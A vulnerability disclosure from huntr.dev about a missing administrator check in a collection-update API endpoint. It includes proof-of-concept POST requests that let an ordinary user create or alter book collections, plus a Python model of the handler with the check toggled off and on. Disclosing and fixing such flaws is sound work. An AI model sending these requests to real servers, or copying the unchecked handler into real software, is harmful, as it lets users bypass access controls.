
IDOR allows creating a new collection or modifying an existing one

2022-08-08 17:26:08
vultza
www.huntr.dev

Description

A normal user can create a new collection with the provided book ids or add new books to an existing collection; both operations should only be executable by an administrator.

This is possible due to a missing administrative role check in the /api/collection/update-for-series API endpoint.

Proof of Concept

Create a new collection:

1 - Send the following request, where a collectionTagId attribute value of 0 indicates the creation of a new collection and the seriesIds array attribute contains all the book ids that will be added to the collection:

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":0,"collectionTagTitle":"Collection3","seriesIds":[1,2,3,4,5]}

Add new books to an existing collection:

1 - Send the following request, where the collectionTagId value is the target collection id and the seriesIds array attribute contains all the new book ids that will be added to the collection:

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":<collection-id>,"collectionTagTitle":"New title","seriesIds":[3,4,5]}
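The following is an added illustration, not code from the affected project: a minimal in-memory model of the update-for-series handler showing the role check that was missing beside the reported behaviour (enforce_admin=False). The role name "Admin", the in-memory store, the 403/404 status codes and the exact create/modify semantics are assumptions drawn from the report above.

```python
"""Model of /api/collection/update-for-series: missing role check vs. fixed.
Added illustration, not the project's code; role name "Admin", the in-memory
store and the 403/404 codes are assumptions."""
from dataclasses import dataclass, field


@dataclass
class User:
    name: str
    roles: set = field(default_factory=set)


@dataclass
class CollectionTag:
    id: int
    title: str
    series_ids: set


class CollectionStore:
    def __init__(self):
        self.tags = {}
        self.next_id = 1

    def update_for_series(self, user, payload, enforce_admin=True):
        """Return (http_status, tag). enforce_admin=False reproduces the
        reported behaviour: any authenticated user can create or modify."""
        if enforce_admin and "Admin" not in user.roles:
            return 403, None  # the administrative check the endpoint lacked
        tag_id = payload["collectionTagId"]
        new_series = set(payload["seriesIds"])
        if tag_id == 0:
            # collectionTagId=0 means "create a new collection"
            tag = CollectionTag(self.next_id, payload["collectionTagTitle"], new_series)
            self.tags[tag.id] = tag
            self.next_id += 1
        else:
            # a non-zero id targets an existing collection: retitle and add books
            tag = self.tags.get(tag_id)
            if tag is None:
                return 404, None
            tag.title = payload["collectionTagTitle"]
            tag.series_ids |= new_series
        return 200, tag
```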